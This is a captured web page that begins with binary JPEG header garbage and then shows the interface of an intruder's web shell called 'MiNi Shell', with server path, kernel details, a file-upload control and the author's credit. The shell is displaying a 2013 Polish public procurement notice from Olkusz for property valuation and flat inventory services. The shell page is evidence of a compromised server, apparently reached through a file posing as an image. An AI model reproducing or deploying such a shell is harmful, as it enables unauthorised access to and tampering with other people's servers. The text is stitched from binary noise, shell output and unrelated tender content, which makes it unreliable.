JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130110/15812-N-2013.html

<p class="kh_header"><b>Olkusz: Sporządzanie  wynikających z bieżących  potrzeb Gminy wycen nieruchomości, budynków i lokali mieszkalnych wraz z inwentaryzacją lokalu  i piwnic do uzyskania zaświadczenia o samodzielności lokalu w formie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 15812 - 2013; data zamieszczenia: 10.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Olkusz , ul. Rynek 1, 32-300 Olkusz, woj. małopolskie, tel. 32 626 01 00 w.311, 626 01 61, faks 32 626 01 03, 626 02 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzanie  wynikających z bieżących  potrzeb Gminy wycen nieruchomości, budynków i lokali mieszkalnych wraz z inwentaryzacją lokalu  i piwnic do uzyskania zaświadczenia o samodzielności lokalu w formie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzanie wynikających z bieżących potrzeb Gminy wycen nieruchomości, budynków  i lokali mieszkalnych wraz z inwentaryzacją lokalu i piwnic do uzyskania zaświadczenia o samodzielności lokalu w formie operatów szacunkowych w poniższym zakresie:

1) wykonanie wyceny nieruchomości stanowiącej:
a) jedną działkę,
b) kilka działek w kompleksie.
2) wykonanie wyceny wynagrodzenia z tytułu ustanowienia służebności przejazdu i przechodu  po nieruchomości. 
3) wykonanie wyceny wynagrodzenia (opłata roczna, opłata jednorazowa, odszkodowanie za bezumowne korzystanie z gruntu przez okres 10 lat wstecz) z tytułu ustanowienia służebności przesyłu na nieruchomości w związku z budową urządzeń infrastruktury technicznej po:
a) jednej działce,
b) kilku działkach w kompleksie. 
4) wykonanie wyceny pojedynczego lokalu mieszkalnego w budynku wielomieszkaniowym wraz z ustaleniem wartości udziału w gruncie pod budynkiem.
5) inwentaryzacja lokalu mieszkalnego i piwnic do uzyskania zaświadczenia o samodzielności lokalu.
6) wykonanie wyceny nieruchomości przed i po jej podziale geodezyjnym - do ustalenia opłat adiacenckich (art. 98a ustawy z dn.21.08.1997r. o gospodarce nieruchomościami).
7) wykonanie wyceny działki wydzielonej jako droga publiczna do ustalenia wysokości odszkodowania (art. 98 ust.3 ustawy o gospodarce nieruchomościami).
8) aktualizacja opłat z tytułu wieczystego użytkowania:
a) działki  gruntowej, .
b) działek gruntowych w kompleksie.
9) wykonanie wyceny nieruchomości zabudowanych (z podaniem wartości gruntu i budynku) o kubaturze:
a) do 1000 m3, 
b) powyżej 1000 m3 .
10) wykonanie wyceny wzrostu wartości nieruchomości w związku z uchwaleniem lub zmianą  planu zagospodarowania przestrzennego (art. 36 ust. 4 ustawy o planowaniu i zagospodarowaniu przestrzennym). 
11) wykonanie wyceny nieruchomości ustalającej opłatę z tytułu przekształcenia prawa    użytkowania wieczystego w prawo własności (ustawa z dn. 29.07.2005r. o przekształceniu prawa użytkowania wieczystego w prawo własności nieruchomości). 
12) wykonanie wyceny nieruchomości ustalającej opłatę z tytułu nabycia na własność działki będącej w użytkowaniu wieczystym (ustawa z dn. 21.08.1997r. o gospodarce nieruchomościami).
13) wykonanie opinii w sprawie wartości  rynkowej nieruchomości gruntowej wg stanu na dzień faktycznego wyłączenia z produkcji gruntów leśnych.

Wielkości usług określonych w danych pozycjach zawiera zał. nr 1a do oferty.
Dane wyjściowe:
Materiały pomocnicze przygotowane przez Zamawiającego:
- określenie celu sporządzenia operatu,
- określenie przedmiotu wyceny,
- akta sprawy - każdorazowo do wglądu,
- określenie osoby prowadzącej sprawę.
Wyceny w zakresie szacunków nieruchomości zabudowanych (poza lokalami mieszkaniowymi  znajdującymi się w budynkach  wielomieszkaniowych) należy dokonać dwoma metodami.
Zgodnie z art. 154 ustawy o gospodarce nieruchomościami wybór metody należy do sporządzającego wycenę. Druga metoda dla porównania wartości każdorazowo zostanie uzgodniona z Zamawiającym.
Dane wynikowe:
- operat szacunkowy zgodnie z Ustawą z dnia 21.08.1997r. o gospodarce nieruchomościami (tekst jednolity - Dz. U. z 2004r. Nr 261 poz. 2603 z późn. zm.), ustawy o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003r. (Dz. U. Nr 80, poz.717 z późn. zm.) i rozporządzeniem Rady Ministrów z dnia 21.09.2004r. w sprawie wyceny nieruchomości i sporządzenia operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm.) oraz standardami zawodowymi PFSRM - 2 egzemplarze (3 egzemplarze tylko lokali mieszkalnych),
- fotografie nieruchomości, lokali mieszkalnych (w kilku ujęciach),
- wycinek mapy ewidencyjnej lub zasadniczej dla zakresu określonego w pkt.  1, 4, 8,
- protokół oględzin podpisany przez rzeczoznawcę i zainteresowane osoby,
- protokół badania ksiąg wieczystych.
Inwentaryzacja lokalu mieszkalnego i piwnic:
- rzuty kondygnacji budynku z graficznym oznaczeniem granic lokalu i pomieszczeń przynależnych (zgodnie z zapisem ustawy o własności lokali) wraz z legendą oznaczeń,
- inwentaryzację budowlaną przedmiotowego lokalu wraz z pomieszczeniem do niego przynależnym (rysunki - załączniki do zaświadczeń) sporządzoną przez osobę posiadającą stosowne uprawnienia budowlane,
- opis funkcji izb i pomieszczeń pomocniczych wyodrębnionego lokalu i pomieszczeń przynależnych wraz ze wskazaniem ich powierzchni w m2,
- opis (charakterystykę) ścian wydzielających lokali i pomieszczenia przynależne z wyjaśnieniem, czy są to ściany trwałe (zgodnie z zapisem ustawy o własności lokali),
- opis instalacji wewnętrznych, w jakie wyposażony jest lokal,
- oświadczenie osoby sporządzającej inwentaryzację, że dany lokal spełnia wymogi art. 2 ust. 2 ustawy z dnia 24 czerwca 1994r. o własności lokali i może służyć swemu przeznaczeniu,
- oświadczenie autora opracowania o zgodności dokumentacji ze stanem aktualnym na czas składania wniosku,
- oryginalny podpis osoby sporządzającej inwentaryzację z czytelną pieczęcią oraz datą opracowania,
- uprawnienia budowlane projektanta i wpis na listę członków właściwej izby samorządu zawodowego aktualny na czas sporządzenia inwentaryzacji,
- protokół badania księgi wieczystej.
Wymagany termin wykonania zamówienia: 	od dnia zawarcia umowy do 24 grudnia 2013r. - sukcesywnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20% zamówienia podstawowego polegających na powtórzeniu usług tego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2, 71.31.90.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w szczególności aby Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  min po 3 usługi w następującym zakresie:
1) wykonanie wyceny z tytułu ustanowienia służebności przesyłu na nieruchomości w związku z budową urządzeń infrastruktury technicznej po:
a) jednej działce,
b) kilku działkach w kompleksie.
2) wykonanie wyceny pojedynczego lokalu mieszkalnego w budynku wielomieszkaniowym wraz z ustaleniem wartości udziału w gruncie pod budynkiem.
3) inwentaryzacja lokalu mieszkalnego i piwnic do uzyskania zaświadczenia o samodzielności lokalu.
4) wykonanie wyceny nieruchomości przed i po jej podziale geodezyjnym - do ustalenia opłat adiacenckich (art. 98a ustawy z dn.21.08.1997r. o gospodarce nieruchomościami).
5) wykonanie wyceny nieruchomości zabudowanych (z podaniem wartości gruntu i budynku).
6) wykonanie wyceny wzrostu wartości nieruchomości w związku z uchwaleniem lub zmianą planu zagospodarowania przestrzennego (art.36 ust.4 ustawy o planowaniu i zagospodarowaniu przestrzennym ).
7) wykonanie wyceny nieruchomości ustalającej opłatę z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności (ustawa z dn. 29.07.2005r. o przekształceniu prawa użytkowania wieczystego w prawo własności nieruchomości).
Spełnienie wyżej wymienionych warunków oceni powołana do przeprowadzenia postępowania komisja, badając kompletność i prawidłowość złożonych ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w szczególności: dysponowania co najmniej jedną osobą/osobami posiadającą/posiadającymi uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uprawnienia zawodowe do wykonywania samodzielnych funkcji kierownika budowy i robót.
Spełnienie wyżej wymienionych warunków oceni powołana do przeprowadzenia postępowania komisja, badając kompletność i prawidłowość złożonych ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w szczególności posiadania opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 25 000 euro.
Spełnienie wyżej wymienionych warunków oceni powołana do przeprowadzenia postępowania komisja, badając kompletność i prawidłowość złożonych ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy; zestawienie cen jednostkowych; pełnomocnictwo do podpisania oferty jeśli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania usługi na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/bip/olkusz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można odebrać w UMiG Olkusz w pokoju nr 311  lub pobrać ze strony internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 09:00, miejsce: Oferty należy składać w punkcie informacyjno - podawczym w siedzibie zamawiającego (UMiG Olkusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com